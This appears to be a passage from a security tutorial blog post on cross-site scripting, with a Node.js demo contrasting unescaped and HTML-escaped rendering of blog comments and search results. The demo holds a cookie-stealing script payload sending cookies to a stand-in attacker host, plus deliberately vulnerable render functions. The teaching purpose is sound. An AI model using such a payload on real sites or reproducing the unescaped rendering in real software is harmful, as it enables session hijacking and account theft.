If successful, this technique gives the attacker a wide range of options:
– stealing cookies and impersonating another user’s session (if that user happens to be an admin, it’s your lucky day),
– resetting other users’ passwords,
– redirecting users to a different, malicious web site,
– running a JavaScript keylogger inside the victim users’ browsers, etc.
How do you do it?
Another common method is to type or paste the code into input fields on the target web page whose contents are then written back into the page. Typical examples are search fields (when the search term is echoed alongside the results), comment fields on blog posts, and posts on forums, chats or other social media.
In this case there is no need for phishing. Including the malicious code in a comment on a blog post stores the code in the site’s content database, and it is then executed every time a subsequent user visits the post. Because the browser executes the code instead of treating it as text, nothing is rendered for it on the page, so the victims never see it. This is called stored XSS.
Some web developers, however, lack a full understanding of XSS and write user-supplied content back into their pages without encoding or sanitizing it properly. That is where an attacker gains leverage.
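The following is an added example, not code from the original post: a minimal blog-comment and search-result renderer in Node.js, once without output encoding (the stored and reflected cases described above) and once with HTML escaping applied to every user-controlled value. The in-memory "database", the account names and the `attacker.example` payload are constructed for the demo; `containsActiveContent` is a rough heuristic for inspecting generated HTML, not a substitute for encoding.

```javascript
// Added example (not from the original post). Demonstrates why stored and
// reflected XSS work, and how output encoding neutralises the same payload.

// Escape the characters that let user input break out of an HTML text context.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
  })[ch]);
}

// Stand-in for the site's content database: whatever a visitor submits is stored as-is.
const commentDb = [];

function storeComment(author, body) {
  commentDb.push({ author, body });
}

// Stored XSS, vulnerable: user-controlled text is concatenated straight into the page,
// so a <script> tag submitted once runs in the browser of every later visitor.
function renderPostVulnerable() {
  return commentDb
    .map((c) => `<div class="comment"><b>${c.author}</b>: ${c.body}</div>`)
    .join("\n");
}

// Stored XSS, hardened: every user-controlled value is HTML-encoded on output,
// so the payload is displayed as literal text instead of being executed.
function renderPostSafe() {
  return commentDb
    .map((c) => `<div class="comment"><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</div>`)
    .join("\n");
}

// Reflected XSS: the search term is echoed back in the same response.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Heuristic check over generated HTML: a raw <script> tag or an inline event handler
// attribute means user input reached the page as markup rather than as text.
function containsActiveContent(html) {
  return /<script\b|\son\w+\s*=/i.test(html);
}

// Constructed sample data: one ordinary comment and one carrying a cookie-stealing payload.
const TEST_PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';
storeComment("alice", "Great post!");
storeComment("mallory", TEST_PAYLOAD);

console.log("stored, vulnerable render executes payload:", containsActiveContent(renderPostVulnerable()));
console.log("stored, escaped render executes payload:   ", containsActiveContent(renderPostSafe()));
console.log("reflected, vulnerable render executes payload:", containsActiveContent(renderSearchVulnerable(TEST_PAYLOAD)));
console.log("reflected, escaped render executes payload:   ", containsActiveContent(renderSearchSafe(TEST_PAYLOAD)));
console.log(renderPostSafe());
```

Run it with `node` and compare the two renders: the vulnerable one contains a live `<script>` element that the browser executes silently, exactly the "users will not see it" behaviour described above, while the escaped one shows the payload as harmless text. Note that `escapeHtml` is only correct for HTML text and quoted attribute values; a value placed inside a `<script>` block, a URL, or CSS needs the encoding appropriate to that context.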
Hungry for more?
You can take things further with:
Bugcrowd University’s XSS video tutorial.
HackerSploit’s XSS video tutorial.
TryHackMe also has two XSS training rooms.